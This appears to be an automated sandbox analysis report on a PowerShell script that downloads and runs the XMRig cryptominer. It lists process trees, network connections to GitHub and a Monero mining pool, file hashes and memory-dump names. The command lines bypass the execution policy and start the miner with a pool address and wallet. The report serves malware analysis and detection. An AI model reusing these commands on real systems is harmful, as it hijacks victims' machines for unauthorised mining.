Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4540 wrote to memory of 3476 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4540 wrote to memory of 3476 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
Files
memory/4540-0-0x00007FFCC3B93000-0x00007FFCC3B94000-memory.dmp
memory/4540-5-0x000001F4D9260000-0x000001F4D9282000-memory.dmp
memory/4540-6-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
memory/4540-9-0x000001F4F1790000-0x000001F4F1806000-memory.dmp
memory/4540-10-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bx2abgun.4f1.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4540-25-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
memory/4540-48-0x000001F4F1740000-0x000001F4F1752000-memory.dmp
memory/4540-61-0x000001F4F1720000-0x000001F4F172A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3476-90-0x0000027A3AE70000-0x0000027A3AE90000-memory.dmp
memory/3476-91-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-92-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/4540-94-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
memory/4540-93-0x00007FFCC3B93000-0x00007FFCC3B94000-memory.dmp
memory/4540-95-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
memory/3476-96-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-97-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-98-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-99-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-100-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-101-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-102-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-103-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-104-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-105-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-106-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-107-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-108-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-109-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-110-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-111-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-112-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-113-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-114-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-115-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-116-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-117-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-118-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-119-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-120-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-121-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-122-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-123-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-124-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-125-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-126-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-127-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-128-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-129-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-130-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-131-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-132-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-133-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-134-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-135-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-136-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-137-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-138-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-139-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-140-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-141-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-142-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-143-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-144-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-145-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-146-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-147-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-148-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-149-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-150-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-151-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-152-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-153-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-154-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-155-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
memory/3476-156-0x00007FF719CD0000-0x00007FF71A903000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:58
Platform
win7-20231129-en
Max time kernel
1565s
Max time network
1566s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
Files
memory/2040-6-0x00000000021D0000-0x00000000021D8000-memory.dmp
memory/2040-5-0x000000001B680000-0x000000001B962000-memory.dmp
memory/2040-4-0x000007FEF546E000-0x000007FEF546F000-memory.dmp
memory/2040-7-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
memory/2040-8-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
memory/2040-9-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
memory/2040-10-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
memory/2040-11-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win11-20240611-en
Max time kernel
1798s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3092 wrote to memory of 240 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3092 wrote to memory of 240 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/3092-0-0x00007FFBE9C73000-0x00007FFBE9C75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fx33gqzl.qeq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3092-9-0x0000021D47140000-0x0000021D47162000-memory.dmp
memory/3092-10-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp
memory/3092-11-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp
memory/3092-12-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp
memory/3092-14-0x0000021D47170000-0x0000021D47182000-memory.dmp
memory/3092-15-0x0000021D47130000-0x0000021D4713A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/240-46-0x000002181EF10000-0x000002181EF30000-memory.dmp
memory/240-47-0x00000218B2740000-0x00000218B2760000-memory.dmp
memory/240-48-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/3092-49-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp
memory/240-51-0x00000218B2DC0000-0x00000218B2DE0000-memory.dmp
memory/240-50-0x00000218B2DA0000-0x00000218B2DC0000-memory.dmp
memory/3092-53-0x00007FFBE9C73000-0x00007FFBE9C75000-memory.dmp
memory/240-52-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-54-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-55-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-56-0x00000218B2DA0000-0x00000218B2DC0000-memory.dmp
memory/240-57-0x00000218B2DC0000-0x00000218B2DE0000-memory.dmp
memory/240-58-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-59-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-60-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-61-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-62-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-63-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-64-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-65-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-66-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-67-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-68-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-69-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-70-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-71-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-72-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-73-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-74-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-75-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-76-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-77-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-78-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-79-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-80-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-81-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-82-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-83-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-84-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-85-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-86-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-87-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-88-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-89-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-90-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-91-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-92-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-93-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-94-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-95-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-96-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-97-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-98-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-99-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-100-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-101-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-102-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-103-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-104-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-105-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-106-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-107-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-108-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-109-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-110-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-111-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-112-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-113-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-114-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-115-0x00007FF749620000-0x00007FF74A253000-memory.dmp
memory/240-116-0x00007FF749620000-0x00007FF74A253000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win7-20240508-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
Files
memory/2116-4-0x000007FEF5A5E000-0x000007FEF5A5F000-memory.dmp
memory/2116-5-0x000000001B890000-0x000000001BB72000-memory.dmp
memory/2116-6-0x0000000001D20000-0x0000000001D28000-memory.dmp
memory/2116-7-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
memory/2116-8-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
memory/2116-9-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
memory/2116-10-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
memory/2116-11-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
memory/2116-12-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win10-20240611-en
Max time kernel
1797s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 520 wrote to memory of 800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 520 wrote to memory of 800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/520-3-0x00007FFA85573000-0x00007FFA85574000-memory.dmp
